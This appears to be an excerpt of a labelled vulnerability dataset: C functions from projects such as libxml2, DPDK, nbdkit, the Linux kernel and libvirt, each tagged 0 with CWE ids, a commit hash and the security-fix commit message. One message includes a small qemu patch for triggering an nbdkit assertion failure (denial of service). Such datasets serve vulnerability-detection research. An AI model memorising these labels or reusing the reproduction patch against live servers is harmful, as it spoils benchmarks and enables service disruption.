hash_clear(&aff->af_comp);
}
| 0 |
[
"CWE-190"
] |
vim
|
399c297aa93afe2c0a39e2a1b3f972aebba44c9d
| 187,535,697,576,664,120,000,000,000,000,000,000,000 | 32 |
patch 8.0.0322: possible overflow with corrupted spell file
Problem: Possible overflow with spell file where the tree length is
corrupted.
Solution: Check for an invalid length (suggested by shqking)
|
xmlParseCommentComplex(xmlParserCtxtPtr ctxt, xmlChar *buf,
size_t len, size_t size) {
int q, ql;
int r, rl;
int cur, l;
size_t count = 0;
int inputid;
inputid = ctxt->input->id;
if (buf == NULL) {
len = 0;
size = XML_PARSER_BUFFER_SIZE;
buf = (xmlChar *) xmlMallocAtomic(size * sizeof(xmlChar));
if (buf == NULL) {
xmlErrMemory(ctxt, NULL);
return;
}
}
GROW; /* Assure there's enough input data */
q = CUR_CHAR(ql);
if (q == 0)
goto not_terminated;
if (!IS_CHAR(q)) {
xmlFatalErrMsgInt(ctxt, XML_ERR_INVALID_CHAR,
"xmlParseComment: invalid xmlChar value %d\n",
q);
xmlFree (buf);
return;
}
NEXTL(ql);
r = CUR_CHAR(rl);
if (r == 0)
goto not_terminated;
if (!IS_CHAR(r)) {
xmlFatalErrMsgInt(ctxt, XML_ERR_INVALID_CHAR,
"xmlParseComment: invalid xmlChar value %d\n",
q);
xmlFree (buf);
return;
}
NEXTL(rl);
cur = CUR_CHAR(l);
if (cur == 0)
goto not_terminated;
while (IS_CHAR(cur) && /* checked */
((cur != '>') ||
(r != '-') || (q != '-'))) {
if ((r == '-') && (q == '-')) {
xmlFatalErr(ctxt, XML_ERR_HYPHEN_IN_COMMENT, NULL);
}
if ((len > XML_MAX_TEXT_LENGTH) &&
((ctxt->options & XML_PARSE_HUGE) == 0)) {
xmlFatalErrMsgStr(ctxt, XML_ERR_COMMENT_NOT_FINISHED,
"Comment too big found", NULL);
xmlFree (buf);
return;
}
if (len + 5 >= size) {
xmlChar *new_buf;
size_t new_size;
new_size = size * 2;
new_buf = (xmlChar *) xmlRealloc(buf, new_size);
if (new_buf == NULL) {
xmlFree (buf);
xmlErrMemory(ctxt, NULL);
return;
}
buf = new_buf;
size = new_size;
}
COPY_BUF(ql,buf,len,q);
q = r;
ql = rl;
r = cur;
rl = l;
count++;
if (count > 50) {
SHRINK;
GROW;
count = 0;
if (ctxt->instate == XML_PARSER_EOF) {
xmlFree(buf);
return;
}
}
NEXTL(l);
cur = CUR_CHAR(l);
if (cur == 0) {
SHRINK;
GROW;
cur = CUR_CHAR(l);
}
}
buf[len] = 0;
if (cur == 0) {
xmlFatalErrMsgStr(ctxt, XML_ERR_COMMENT_NOT_FINISHED,
"Comment not terminated \n<!--%.50s\n", buf);
} else if (!IS_CHAR(cur)) {
xmlFatalErrMsgInt(ctxt, XML_ERR_INVALID_CHAR,
"xmlParseComment: invalid xmlChar value %d\n",
cur);
} else {
if (inputid != ctxt->input->id) {
xmlFatalErrMsg(ctxt, XML_ERR_ENTITY_BOUNDARY,
"Comment doesn't start and stop in the same"
" entity\n");
}
NEXT;
if ((ctxt->sax != NULL) && (ctxt->sax->comment != NULL) &&
(!ctxt->disableSAX))
ctxt->sax->comment(ctxt->userData, buf);
}
xmlFree(buf);
return;
not_terminated:
xmlFatalErrMsgStr(ctxt, XML_ERR_COMMENT_NOT_FINISHED,
"Comment not terminated\n", NULL);
xmlFree(buf);
return;
}
| 0 |
[
"CWE-776"
] |
libxml2
|
8598060bacada41a0eb09d95c97744ff4e428f8e
| 129,127,758,668,119,930,000,000,000,000,000,000,000 | 123 |
Patch for security issue CVE-2021-3541
This is related to parameter entities expansion and following
the line of the billion laugh attack. Somehow in that path the
counting of parameters was missed and the normal algorithm based
on entities "density" was useless.
|
int rte_vhost_host_notifier_ctrl(int vid, uint16_t qid, bool enable)
{
struct virtio_net *dev;
struct rte_vdpa_device *vdpa_dev;
int vfio_device_fd, ret = 0;
uint64_t offset, size;
unsigned int i, q_start, q_last;
dev = get_device(vid);
if (!dev)
return -ENODEV;
vdpa_dev = dev->vdpa_dev;
if (vdpa_dev == NULL)
return -ENODEV;
if (!(dev->features & (1ULL << VIRTIO_F_VERSION_1)) ||
!(dev->features & (1ULL << VHOST_USER_F_PROTOCOL_FEATURES)) ||
!(dev->protocol_features &
(1ULL << VHOST_USER_PROTOCOL_F_SLAVE_REQ)) ||
!(dev->protocol_features &
(1ULL << VHOST_USER_PROTOCOL_F_SLAVE_SEND_FD)) ||
!(dev->protocol_features &
(1ULL << VHOST_USER_PROTOCOL_F_HOST_NOTIFIER)))
return -ENOTSUP;
if (qid == RTE_VHOST_QUEUE_ALL) {
q_start = 0;
q_last = dev->nr_vring - 1;
} else {
if (qid >= dev->nr_vring)
return -EINVAL;
q_start = qid;
q_last = qid;
}
RTE_FUNC_PTR_OR_ERR_RET(vdpa_dev->ops->get_vfio_device_fd, -ENOTSUP);
RTE_FUNC_PTR_OR_ERR_RET(vdpa_dev->ops->get_notify_area, -ENOTSUP);
vfio_device_fd = vdpa_dev->ops->get_vfio_device_fd(vid);
if (vfio_device_fd < 0)
return -ENOTSUP;
if (enable) {
for (i = q_start; i <= q_last; i++) {
if (vdpa_dev->ops->get_notify_area(vid, i, &offset,
&size) < 0) {
ret = -ENOTSUP;
goto disable;
}
if (vhost_user_slave_set_vring_host_notifier(dev, i,
vfio_device_fd, offset, size) < 0) {
ret = -EFAULT;
goto disable;
}
}
} else {
disable:
for (i = q_start; i <= q_last; i++) {
vhost_user_slave_set_vring_host_notifier(dev, i, -1,
0, 0);
}
}
return ret;
}
| 0 |
[
"CWE-125",
"CWE-787"
] |
dpdk
|
6442c329b9d2ded0f44b27d2016aaba8ba5844c5
| 166,447,376,334,192,360,000,000,000,000,000,000,000 | 67 |
vhost: fix queue number check when setting inflight FD
In function vhost_user_set_inflight_fd, queue number in inflight
message is used to access virtqueue. However, queue number could
be larger than VHOST_MAX_VRING and cause write OOB as this number
will be used to write inflight info in virtqueue structure. This
patch checks the queue number to avoid the issue and also makes
sure virtqueues are allocated before setting inflight information.
Fixes: ad0a4ae491fe ("vhost: checkout resubmit inflight information")
Cc: [email protected]
Reported-by: Wenxiang Qian <[email protected]>
Signed-off-by: Chenbo Xia <[email protected]>
Reviewed-by: Maxime Coquelin <[email protected]>
|
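The DPDK advisory is the standard case of an index taken from the wire: a queue number from an inflight message is used to index the virtqueue array without being checked against VHOST_MAX_VRING or against how many queues were actually allocated. The check itself is short; the sketch below uses placeholder types, not DPDK's struct virtio_net:

```c
#include <stddef.h>

#define MAX_VRING 256                  /* stands in for VHOST_MAX_VRING */

struct vring_state { int inflight; };

struct dev_state {
    struct vring_state vq[MAX_VRING];
    unsigned int nr_vring;             /* how many were actually allocated */
};

/* Returns 0 on success, -1 when the untrusted index is rejected. */
static int set_inflight(struct dev_state *dev, unsigned int queue_idx, int val)
{
    if (queue_idx >= MAX_VRING)        /* bound of the backing array       */
        return -1;
    if (queue_idx >= dev->nr_vring)    /* and of what was really set up    */
        return -1;
    dev->vq[queue_idx].inflight = val;
    return 0;
}
```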
filter_config (struct backend *b, const char *key, const char *value)
{
struct backend_filter *f = container_of (b, struct backend_filter, backend);
debug ("%s: config key=%s, value=%s",
b->name, key, value);
if (f->filter.config) {
if (f->filter.config (next_config, b->next, key, value) == -1)
exit (EXIT_FAILURE);
}
else
b->next->config (b->next, key, value);
}
| 0 |
[
"CWE-406"
] |
nbdkit
|
a6b88b195a959b17524d1c8353fd425d4891dc5f
| 94,369,123,405,215,490,000,000,000,000,000,000,000 | 14 |
server: Fix regression for NBD_OPT_INFO before NBD_OPT_GO
Most known NBD clients do not bother with NBD_OPT_INFO (except for
clients like 'qemu-nbd --list' that don't ever intend to connect), but
go straight to NBD_OPT_GO. However, it's not too hard to hack up qemu
to add in an extra client step (whether info on the same name, or more
interestingly, info on a different name), as a patch against qemu
commit 6f214b30445:
| diff --git i/nbd/client.c w/nbd/client.c
| index f6733962b49b..425292ac5ea9 100644
| --- i/nbd/client.c
| +++ w/nbd/client.c
| @@ -1038,6 +1038,14 @@ int nbd_receive_negotiate(AioContext *aio_context, QIOChannel *ioc,
| * TLS). If it is not available, fall back to
| * NBD_OPT_LIST for nicer error messages about a missing
| * export, then use NBD_OPT_EXPORT_NAME. */
| + if (getenv ("HACK"))
| + info->name[0]++;
| + result = nbd_opt_info_or_go(ioc, NBD_OPT_INFO, info, errp);
| + if (getenv ("HACK"))
| + info->name[0]--;
| + if (result < 0) {
| + return -EINVAL;
| + }
| result = nbd_opt_info_or_go(ioc, NBD_OPT_GO, info, errp);
| if (result < 0) {
| return -EINVAL;
This works just fine in 1.14.0, where we call .open only once (so the
INFO and GO repeat calls into the same plugin handle), but in 1.14.1
it regressed into causing an assertion failure: we are now calling
.open a second time on a connection that is already opened:
$ nbdkit -rfv null &
$ hacked-qemu-io -f raw -r nbd://localhost -c quit
...
nbdkit: null[1]: debug: null: open readonly=1
nbdkit: backend.c:179: backend_open: Assertion `h->handle == NULL' failed.
Worse, on the mainline development, we have recently made it possible
for plugins to actively report different information for different
export names; for example, a plugin may choose to report different
answers for .can_write on export A than for export B; but if we share
cached handles, then an NBD_OPT_INFO on one export prevents correct
answers for NBD_OPT_GO on the second export name. (The HACK envvar in
my qemu modifications can be used to demonstrate cross-name requests,
which are even less likely in a real client).
The solution is to call .close after NBD_OPT_INFO, coupled with enough
glue logic to reset cached connection handles back to the state
expected by .open. This in turn means factoring out another backend_*
function, but also gives us an opportunity to change
backend_set_handle to no longer accept NULL.
The assertion failure is, to some extent, a possible denial of service
attack (one client can force nbdkit to exit by merely sending OPT_INFO
before OPT_GO, preventing the next client from connecting), although
this is mitigated by using TLS to weed out untrusted clients. Still,
the fact that we introduced a potential DoS attack while trying to fix
a traffic amplification security bug is not very nice.
Sadly, as there are no known clients that easily trigger this mode of
operation (OPT_INFO before OPT_GO), there is no easy way to cover this
via a testsuite addition. I may end up hacking something into libnbd.
Fixes: c05686f957
Signed-off-by: Eric Blake <[email protected]>
|
static int hidinput_get_battery_property(struct power_supply *psy,
enum power_supply_property prop,
union power_supply_propval *val)
{
struct hid_device *dev = power_supply_get_drvdata(psy);
int value;
int ret = 0;
switch (prop) {
case POWER_SUPPLY_PROP_PRESENT:
case POWER_SUPPLY_PROP_ONLINE:
val->intval = 1;
break;
case POWER_SUPPLY_PROP_CAPACITY:
if (dev->battery_status != HID_BATTERY_REPORTED &&
!dev->battery_avoid_query) {
value = hidinput_query_battery_capacity(dev);
if (value < 0)
return value;
} else {
value = dev->battery_capacity;
}
val->intval = value;
break;
case POWER_SUPPLY_PROP_MODEL_NAME:
val->strval = dev->name;
break;
case POWER_SUPPLY_PROP_STATUS:
if (dev->battery_status != HID_BATTERY_REPORTED &&
!dev->battery_avoid_query) {
value = hidinput_query_battery_capacity(dev);
if (value < 0)
return value;
dev->battery_capacity = value;
dev->battery_status = HID_BATTERY_QUERIED;
}
if (dev->battery_status == HID_BATTERY_UNKNOWN)
val->intval = POWER_SUPPLY_STATUS_UNKNOWN;
else if (dev->battery_capacity == 100)
val->intval = POWER_SUPPLY_STATUS_FULL;
else
val->intval = POWER_SUPPLY_STATUS_DISCHARGING;
break;
case POWER_SUPPLY_PROP_SCOPE:
val->intval = POWER_SUPPLY_SCOPE_DEVICE;
break;
default:
ret = -EINVAL;
break;
}
return ret;
}
| 0 |
[
"CWE-787"
] |
linux
|
35556bed836f8dc07ac55f69c8d17dce3e7f0e25
| 287,557,949,231,494,500,000,000,000,000,000,000,000 | 61 |
HID: core: Sanitize event code and type when mapping input
When calling into hid_map_usage(), the passed event code is
blindly stored as is, even if it doesn't fit in the associated bitmap.
This event code can come from a variety of sources, including devices
masquerading as input devices, only a bit more "programmable".
Instead of taking the event code at face value, check that it actually
fits the corresponding bitmap, and if it doesn't:
- spit out a warning so that we know which device is acting up
- NULLify the bitmap pointer so that we catch unexpected uses
Code paths that can make use of untrusted inputs can now check
that the mapping was indeed correct and bail out if not.
Cc: [email protected]
Signed-off-by: Marc Zyngier <[email protected]>
Signed-off-by: Benjamin Tissoires <[email protected]>
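A minimal sketch of the described sanitization, assuming bmap_bits is the size in bits of the bitmap belonging to the event type (the helper name and signature are illustrative, not the exact hid_map_usage() code):
static void hid_map_usage_checked(struct hid_usage *usage, __u8 type, __u16 code,
				  unsigned long *bmap, unsigned int bmap_bits,
				  unsigned long **bit, int *max)
{
	if (code >= bmap_bits) {
		/* Warn so the offending device can be identified. */
		pr_warn("hid: event code 0x%x does not fit type %u bitmap\n",
			code, type);
		*bit = NULL;	/* catch unexpected uses of the mapping */
		return;
	}
	usage->type = type;
	usage->code = code;
	*bit = bmap;
	*max = bmap_bits - 1;
}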
|
static struct slave *bond_get_slave_by_id(struct bonding *bond,
int slave_id)
{
struct list_head *iter;
struct slave *slave;
int i = slave_id;
/* Here we start from the slave with slave_id */
bond_for_each_slave_rcu(bond, slave, iter) {
if (--i < 0) {
if (bond_slave_can_tx(slave))
return slave;
}
}
/* Here we start from the first slave up to slave_id */
i = slave_id;
bond_for_each_slave_rcu(bond, slave, iter) {
if (--i < 0)
break;
if (bond_slave_can_tx(slave))
return slave;
}
/* no slave that can tx has been found */
return NULL;
}
| 0 |
[
"CWE-476",
"CWE-703"
] |
linux
|
105cd17a866017b45f3c45901b394c711c97bf40
| 111,243,842,987,594,160,000,000,000,000,000,000,000 | 26 |
bonding: fix null dereference in bond_ipsec_add_sa()
If bond doesn't have real device, bond->curr_active_slave is null.
But bond_ipsec_add_sa() dereferences bond->curr_active_slave without
null checking.
So, null-ptr-deref would occur.
Test commands:
ip link add bond0 type bond
ip link set bond0 up
ip x s add proto esp dst 14.1.1.1 src 15.1.1.1 spi \
0x07 mode transport reqid 0x07 replay-window 32 aead 'rfc4106(gcm(aes))' \
0x44434241343332312423222114131211f4f3f2f1 128 sel src 14.0.0.52/24 \
dst 14.0.0.70/24 proto tcp offload dev bond0 dir in
Splat looks like:
KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007]
CPU: 4 PID: 680 Comm: ip Not tainted 5.13.0-rc3+ #1168
RIP: 0010:bond_ipsec_add_sa+0xc4/0x2e0 [bonding]
Code: 85 21 02 00 00 4d 8b a6 48 0c 00 00 e8 75 58 44 ce 85 c0 0f 85 14
01 00 00 48 b8 00 00 00 00 00 fc ff df 4c 89 e2 48 c1 ea 03 <80> 3c 02
00 0f 85 fc 01 00 00 48 8d bb e0 02 00 00 4d 8b 2c 24 48
RSP: 0018:ffff88810946f508 EFLAGS: 00010246
RAX: dffffc0000000000 RBX: ffff88810b4e8040 RCX: 0000000000000001
RDX: 0000000000000000 RSI: ffffffff8fe34280 RDI: ffff888115abe100
RBP: ffff88810946f528 R08: 0000000000000003 R09: fffffbfff2287e11
R10: 0000000000000001 R11: ffff888115abe0c8 R12: 0000000000000000
R13: ffffffffc0aea9a0 R14: ffff88800d7d2000 R15: ffff88810b4e8330
FS: 00007efc5552e680(0000) GS:ffff888119c00000(0000)
knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 000055c2530dbf40 CR3: 0000000103056004 CR4: 00000000003706e0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Call Trace:
xfrm_dev_state_add+0x2a9/0x770
? memcpy+0x38/0x60
xfrm_add_sa+0x2278/0x3b10 [xfrm_user]
? xfrm_get_policy+0xaa0/0xaa0 [xfrm_user]
? register_lock_class+0x1750/0x1750
xfrm_user_rcv_msg+0x331/0x660 [xfrm_user]
? rcu_read_lock_sched_held+0x91/0xc0
? xfrm_user_state_lookup.constprop.39+0x320/0x320 [xfrm_user]
? find_held_lock+0x3a/0x1c0
? mutex_lock_io_nested+0x1210/0x1210
? sched_clock_cpu+0x18/0x170
netlink_rcv_skb+0x121/0x350
? xfrm_user_state_lookup.constprop.39+0x320/0x320 [xfrm_user]
? netlink_ack+0x9d0/0x9d0
? netlink_deliver_tap+0x17c/0xa50
xfrm_netlink_rcv+0x68/0x80 [xfrm_user]
netlink_unicast+0x41c/0x610
? netlink_attachskb+0x710/0x710
netlink_sendmsg+0x6b9/0xb70
[ ...]
Fixes: 18cb261afd7b ("bonding: support hardware encryption offload to slaves")
Signed-off-by: Taehee Yoo <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
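A rough sketch of the added null check (simplified; the offload hand-off and surrounding locking are omitted, and the wrapper name is hypothetical):
static int bond_ipsec_add_sa_sketch(struct xfrm_state *xs)
{
	struct net_device *bond_dev = xs->xso.dev;
	struct bonding *bond = netdev_priv(bond_dev);
	struct slave *slave = rcu_dereference(bond->curr_active_slave);

	/* Without a real device enslaved there is nothing to offload to. */
	if (!slave)
		return -ENODEV;

	/* ... hand the state off to the slave device's xfrmdev_ops here ... */
	return 0;
}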
|
virDomainMemoryDefParseXML(virDomainXMLOptionPtr xmlopt,
xmlNodePtr memdevNode,
xmlXPathContextPtr ctxt,
const virDomainDef *dom,
unsigned int flags)
{
VIR_XPATH_NODE_AUTORESTORE(ctxt);
xmlNodePtr node;
virDomainMemoryDefPtr def;
int val;
g_autofree char *tmp = NULL;
if (VIR_ALLOC(def) < 0)
return NULL;
ctxt->node = memdevNode;
if (!(tmp = virXMLPropString(memdevNode, "model"))) {
virReportError(VIR_ERR_XML_ERROR, "%s",
_("missing memory model"));
goto error;
}
if ((def->model = virDomainMemoryModelTypeFromString(tmp)) <= 0) {
virReportError(VIR_ERR_XML_ERROR,
_("invalid memory model '%s'"), tmp);
goto error;
}
VIR_FREE(tmp);
if ((tmp = virXMLPropString(memdevNode, "access"))) {
if ((val = virDomainMemoryAccessTypeFromString(tmp)) <= 0) {
virReportError(VIR_ERR_XML_ERROR,
_("invalid access mode '%s'"), tmp);
goto error;
}
def->access = val;
}
VIR_FREE(tmp);
if ((tmp = virXMLPropString(memdevNode, "discard"))) {
if ((val = virTristateBoolTypeFromString(tmp)) <= 0) {
virReportError(VIR_ERR_XML_ERROR,
_("invalid discard value '%s'"), tmp);
goto error;
}
def->discard = val;
}
VIR_FREE(tmp);
if (def->model == VIR_DOMAIN_MEMORY_MODEL_NVDIMM &&
ARCH_IS_PPC64(dom->os.arch)) {
/* Extract nvdimm uuid or generate a new one */
tmp = virXPathString("string(./uuid[1])", ctxt);
if (!tmp) {
if (virUUIDGenerate(def->uuid) < 0) {
virReportError(VIR_ERR_INTERNAL_ERROR,
"%s", _("Failed to generate UUID"));
goto error;
}
} else if (virUUIDParse(tmp, def->uuid) < 0) {
virReportError(VIR_ERR_INTERNAL_ERROR,
"%s", _("malformed uuid element"));
goto error;
}
}
/* source */
if ((node = virXPathNode("./source", ctxt)) &&
virDomainMemorySourceDefParseXML(node, ctxt, def) < 0)
goto error;
/* target */
if (!(node = virXPathNode("./target", ctxt))) {
virReportError(VIR_ERR_XML_ERROR, "%s",
_("missing <target> element for <memory> device"));
goto error;
}
if (virDomainMemoryTargetDefParseXML(node, ctxt, def) < 0)
goto error;
if (virDomainDeviceInfoParseXML(xmlopt, memdevNode,
&def->info, flags) < 0)
goto error;
return def;
error:
virDomainMemoryDefFree(def);
return NULL;
}
| 0 |
[
"CWE-212"
] |
libvirt
|
a5b064bf4b17a9884d7d361733737fb614ad8979
| 326,886,909,769,779,960,000,000,000,000,000,000,000 | 95 |
conf: Don't format http cookies unless VIR_DOMAIN_DEF_FORMAT_SECURE is used
Starting with 3b076391befc3fe72deb0c244ac6c2b4c100b410
(v6.1.0-122-g3b076391be) we support http cookies. Since they may contain
somewhat sensitive information we should not format them into the XML
unless VIR_DOMAIN_DEF_FORMAT_SECURE is asserted.
Reported-by: Han Han <[email protected]>
Signed-off-by: Peter Krempa <[email protected]>
Reviewed-by: Erik Skultety <[email protected]>
|
int LibRaw::dcraw_ppm_tiff_writer(const char *filename)
{
CHECK_ORDER_LOW(LIBRAW_PROGRESS_LOAD_RAW);
if(!imgdata.image)
return LIBRAW_OUT_OF_ORDER_CALL;
if(!filename)
return ENOENT;
FILE *f = fopen(filename,"wb");
if(!f)
return errno;
try {
if(!libraw_internal_data.output_data.histogram)
{
libraw_internal_data.output_data.histogram =
(int (*)[LIBRAW_HISTOGRAM_SIZE]) malloc(sizeof(*libraw_internal_data.output_data.histogram)*4);
merror(libraw_internal_data.output_data.histogram,"LibRaw::dcraw_ppm_tiff_writer()");
}
libraw_internal_data.internal_data.output = f;
write_ppm_tiff();
SET_PROC_FLAG(LIBRAW_PROGRESS_FLIP);
libraw_internal_data.internal_data.output = NULL;
fclose(f);
return 0;
}
catch ( LibRaw_exceptions err) {
fclose(f);
EXCEPTION_HANDLER(err);
}
}
| 0 |
[
"CWE-129"
] |
LibRaw
|
89d065424f09b788f443734d44857289489ca9e2
| 285,835,461,725,359,320,000,000,000,000,000,000,000 | 33 |
fixed two more problems found by fuzzer
|
static ssize_t ext4_ui_proc_write(struct file *file, const char __user *buf,
size_t cnt, loff_t *ppos)
{
unsigned long *p = PDE(file->f_path.dentry->d_inode)->data;
char str[32];
if (cnt >= sizeof(str))
return -EINVAL;
if (copy_from_user(str, buf, cnt))
return -EFAULT;
*p = simple_strtoul(str, NULL, 0);
return cnt;
}
| 0 |
[
"CWE-20"
] |
linux-2.6
|
4ec110281379826c5cf6ed14735e47027c3c5765
| 18,296,928,070,590,842,000,000,000,000,000,000,000 | 14 |
ext4: Add sanity checks for the superblock before mounting the filesystem
This avoids insane superblock configurations that could lead to kernel
oops due to null pointer dereferences.
http://bugzilla.kernel.org/show_bug.cgi?id=12371
Thanks to David Maciejak at Fortinet's FortiGuard Global Security
Research Team who discovered this bug independently (but at
approximately the same time) as Thiemo Nagel, who submitted the patch.
Signed-off-by: Thiemo Nagel <[email protected]>
Signed-off-by: "Theodore Ts'o" <[email protected]>
Cc: [email protected]
|
template<typename T>
inline T pow3(const T& val) {
return val*val*val;
| 0 |
[
"CWE-119",
"CWE-787"
] |
CImg
|
ac8003393569aba51048c9d67e1491559877b1d1
| 54,208,983,422,446,720,000,000,000,000,000,000,000 | 3 |
.
|
bool ipv6_chk_custom_prefix(const struct in6_addr *addr,
const unsigned int prefix_len, struct net_device *dev)
{
struct inet6_dev *idev;
struct inet6_ifaddr *ifa;
bool ret = false;
rcu_read_lock();
idev = __in6_dev_get(dev);
if (idev) {
read_lock_bh(&idev->lock);
list_for_each_entry(ifa, &idev->addr_list, if_list) {
ret = ipv6_prefix_equal(addr, &ifa->addr, prefix_len);
if (ret)
break;
}
read_unlock_bh(&idev->lock);
}
rcu_read_unlock();
return ret;
}
| 0 |
[
"CWE-20"
] |
linux
|
77751427a1ff25b27d47a4c36b12c3c8667855ac
| 102,611,992,002,814,720,000,000,000,000,000,000,000 | 22 |
ipv6: addrconf: validate new MTU before applying it
Currently we don't check if the new MTU is valid or not and this allows
one to configure an MTU smaller than the minimum allowed by RFCs or even
bigger than the interface's own MTU, which is a problem as it may lead to packet
drops.
If you have a daemon like NetworkManager running, this may be exploited
by remote attackers by forging RA packets with an invalid MTU, possibly
leading to a DoS. (NetworkManager currently only validates for values
too small, but not for too big ones.)
The fix is just to make sure the new value is valid. That is, between
IPV6_MIN_MTU and interface's MTU.
Note that similar check is already performed at
ndisc_router_discovery(), for when kernel itself parses the RA.
Signed-off-by: Marcelo Ricardo Leitner <[email protected]>
Signed-off-by: Sabrina Dubroca <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
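The check itself is small; a sketch of the validation the commit describes (the helper name is an assumption):
static bool addrconf_ra_mtu_valid(const struct net_device *dev, u32 mtu)
{
	/* RFC minimum is IPV6_MIN_MTU (1280); never exceed the link MTU. */
	return mtu >= IPV6_MIN_MTU && mtu <= dev->mtu;
}
An RA-supplied MTU is then simply ignored whenever this helper returns false.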
|
static void nf_conntrack_pernet_exit(struct list_head *net_exit_list)
{
struct net *net;
list_for_each_entry(net, net_exit_list, exit_list)
nf_conntrack_fini_net(net);
nf_conntrack_cleanup_net_list(net_exit_list);
}
| 0 |
[
"CWE-203"
] |
linux
|
2671fa4dc0109d3fb581bc3078fdf17b5d9080f6
| 249,286,094,008,934,250,000,000,000,000,000,000,000 | 9 |
netfilter: conntrack: Make global sysctls readonly in non-init netns
These sysctls point to global variables:
- NF_SYSCTL_CT_MAX (&nf_conntrack_max)
- NF_SYSCTL_CT_EXPECT_MAX (&nf_ct_expect_max)
- NF_SYSCTL_CT_BUCKETS (&nf_conntrack_htable_size_user)
Because their data pointers are not updated to point to per-netns
structures, they must be marked read-only in a non-init_net ns.
Otherwise, changes in any net namespace are reflected in (leaked into)
all other net namespaces. This problem has existed since the
introduction of net namespaces.
The current logic marks them read-only only if the net namespace is
owned by an unprivileged user (other than init_user_ns).
Commit d0febd81ae77 ("netfilter: conntrack: re-visit sysctls in
unprivileged namespaces") "exposes all sysctls even if the namespace is
unprivileged." Since we need to mark them readonly in any case, we can
forego the unprivileged user check altogether.
Fixes: d0febd81ae77 ("netfilter: conntrack: re-visit sysctls in unprivileged namespaces")
Signed-off-by: Jonathon Reinhart <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
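A sketch of the resulting behaviour (the indices are those named above; the table layout and helper name are assumptions):
static void nf_conntrack_protect_globals(struct net *net, struct ctl_table *table)
{
	/* These entries point at global state, so outside init_net they
	 * must not be writable at all. */
	if (net_eq(net, &init_net))
		return;

	table[NF_SYSCTL_CT_MAX].mode = 0444;
	table[NF_SYSCTL_CT_EXPECT_MAX].mode = 0444;
	table[NF_SYSCTL_CT_BUCKETS].mode = 0444;
}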
|
static int snd_usb_pcm_close(struct snd_pcm_substream *substream, int direction)
{
struct snd_usb_stream *as = snd_pcm_substream_chip(substream);
struct snd_usb_substream *subs = &as->substream[direction];
stop_endpoints(subs, true);
if (subs->interface >= 0 &&
!snd_usb_lock_shutdown(subs->stream->chip)) {
usb_set_interface(subs->dev, subs->interface, 0);
subs->interface = -1;
snd_usb_unlock_shutdown(subs->stream->chip);
}
subs->pcm_substream = NULL;
snd_usb_autosuspend(subs->stream->chip);
return 0;
}
| 0 |
[] |
sound
|
447d6275f0c21f6cc97a88b3a0c601436a4cdf2a
| 56,722,150,290,670,430,000,000,000,000,000,000,000 | 19 |
ALSA: usb-audio: Add sanity checks for endpoint accesses
Add some sanity check codes before actually accessing the endpoint via
get_endpoint() in order to avoid the invalid access through a
malformed USB descriptor. Mostly just checking bNumEndpoints, but in
one place (snd_microii_spdif_default_get()), the validity of iface and
altsetting index is checked as well.
Bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=971125
Cc: <[email protected]>
Signed-off-by: Takashi Iwai <[email protected]>
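The added checks boil down to validating an index against bNumEndpoints before dereferencing; roughly (a sketch, not the exact helper):
static struct usb_host_endpoint *
get_endpoint_checked(struct usb_host_interface *alts, unsigned int ep)
{
	/* A malformed descriptor may advertise fewer endpoints than the
	 * driver expects; never index past bNumEndpoints. */
	if (ep >= alts->desc.bNumEndpoints)
		return NULL;
	return &alts->endpoint[ep];
}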
|
_equalCoerceToDomain(const CoerceToDomain *a, const CoerceToDomain *b)
{
COMPARE_NODE_FIELD(arg);
COMPARE_SCALAR_FIELD(resulttype);
COMPARE_SCALAR_FIELD(resulttypmod);
COMPARE_SCALAR_FIELD(resultcollid);
COMPARE_COERCIONFORM_FIELD(coercionformat);
COMPARE_LOCATION_FIELD(location);
return true;
}
| 0 |
[
"CWE-362"
] |
postgres
|
5f173040e324f6c2eebb90d86cf1b0cdb5890f0a
| 27,860,952,516,362,890,000,000,000,000,000,000,000 | 11 |
Avoid repeated name lookups during table and index DDL.
If the name lookups come to different conclusions due to concurrent
activity, we might perform some parts of the DDL on a different table
than other parts. At least in the case of CREATE INDEX, this can be
used to cause the permissions checks to be performed against a
different table than the index creation, allowing for a privilege
escalation attack.
This changes the calling convention for DefineIndex, CreateTrigger,
transformIndexStmt, transformAlterTableStmt, CheckIndexCompatible
(in 9.2 and newer), and AlterTable (in 9.1 and older). In addition,
CheckRelationOwnership is removed in 9.2 and newer and the calling
convention is changed in older branches. A field has also been added
to the Constraint node (FkConstraint in 8.4). Third-party code calling
these functions or using the Constraint node will require updating.
Report by Andres Freund. Patch by Robert Haas and Andres Freund,
reviewed by Tom Lane.
Security: CVE-2014-0062
|
RetryStatePtr ProdFilter::createRetryState(const RetryPolicy& policy,
Http::RequestHeaderMap& request_headers,
const Upstream::ClusterInfo& cluster,
const VirtualCluster* vcluster, Runtime::Loader& runtime,
Random::RandomGenerator& random,
Event::Dispatcher& dispatcher, TimeSource& time_source,
Upstream::ResourcePriority priority) {
return RetryStateImpl::create(policy, request_headers, cluster, vcluster, runtime, random,
dispatcher, time_source, priority);
}
| 0 |
[
"CWE-703"
] |
envoy
|
18871dbfb168d3512a10c78dd267ff7c03f564c6
| 255,380,517,519,243,800,000,000,000,000,000,000,000 | 10 |
[1.18] CVE-2022-21655
Crash with direct_response
Signed-off-by: Otto van der Schaaf <[email protected]>
|
HBoundsCheck* UpperCheck() const { return upper_check_; }
| 0 |
[] |
node
|
fd80a31e0697d6317ce8c2d289575399f4e06d21
| 32,862,901,829,262,280,000,000,000,000,000,000,000 | 1 |
deps: backport 5f836c from v8 upstream
Original commit message:
Fix Hydrogen bounds check elimination
When combining bounds checks, they must all be moved before the first load/store
that they are guarding.
BUG=chromium:344186
LOG=y
[email protected]
Review URL: https://codereview.chromium.org/172093002
git-svn-id: https://v8.googlecode.com/svn/branches/bleeding_edge@19475 ce2b1a6d-e550-0410-aec6-3dcde31c8c00
fix #8070
|
timer_delete(timer_t timer_id)
{
struct itimerval timerval;
if (timer_id != 0)
return -1;
memset(&timerval, 0, sizeof(struct itimerval));
return setitimer(ITIMER_REAL, &timerval, NULL);
}
| 0 |
[
"CWE-416"
] |
owntone-server
|
